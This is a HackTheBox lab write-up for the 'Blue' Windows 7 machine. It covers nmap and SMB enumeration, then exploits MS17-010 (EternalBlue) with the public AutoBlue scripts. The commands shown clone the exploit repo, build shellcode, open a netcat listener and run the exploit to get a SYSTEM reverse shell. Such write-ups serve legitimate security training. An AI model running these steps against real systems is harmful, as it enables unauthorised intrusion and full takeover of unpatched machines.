HacktheBox - Blue Writeup


Initial Enumeration

1. Nmap Scan

Let's start with a scan of the target ip address:

nmap -sC -sV -oA nmap/initial.tcp

So from the nmap scan we see that the quite a few ports open specifically for Windows RPC, then there is the more common open ports of 135,139 and 445. 

There is also a potential username that may be useful later, Haris.  

As SMB is really the only interesting port open on this machine, it seems that the way to elevate our privileges will either be through SMB or potentially via an EternalBlue exploit as from the scan we know that the machine is running a Windows 7 SP1 7601 Build OS. 

2. SMB Enumeration 

We can use smbmap to determine if we have access to any network shares when trying to access them as an anonymous user. 

smbmap -H -u anonymous

As it turns out, we dont have access to any shares. 

As I think the only other option to root this machine is via EternalBlue, lets look more into it and see if we can exploit it without the use of metasploit. 

3. Finding MS17-010 Eternalblue exploit 

As I have exploited EternalBlue before on other machines, I know that there is a reliable github page from @3ndG4me that autoexploits MS17-010 for various Windows OS types. 


4. Exploiting MS17-010 with AutoBlue

Firstly, we need to clone the github repo

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git

Follow the README and follow the steps show to create the shellcode needed for the exploit.  

Below are the settings I used to create the shellcode for the exploit.

Once the shellcode script completes, several binary files are created. We will use the binary file called sc_all.bin.

Before we execute the file, we need to start a netcat listener to catch the connection from the machine. 

nc -lvnp 9000

We can now select the desired eternalblue exploit. Because the machine we want to exploit is a windows 7 machine, we will use the eternalblue_exploit7.py script. 

python eternalblue_exploit7.py shellcode/sc_all.bin

We now have a connection back on our netcat listener from the machine as SYSTEM! 

As we are SYSTEM, it means that we can grab both the user and root flags! 

user.txt was found in the user haris desktop directory:

root.txt was found in the administrators desktop directory: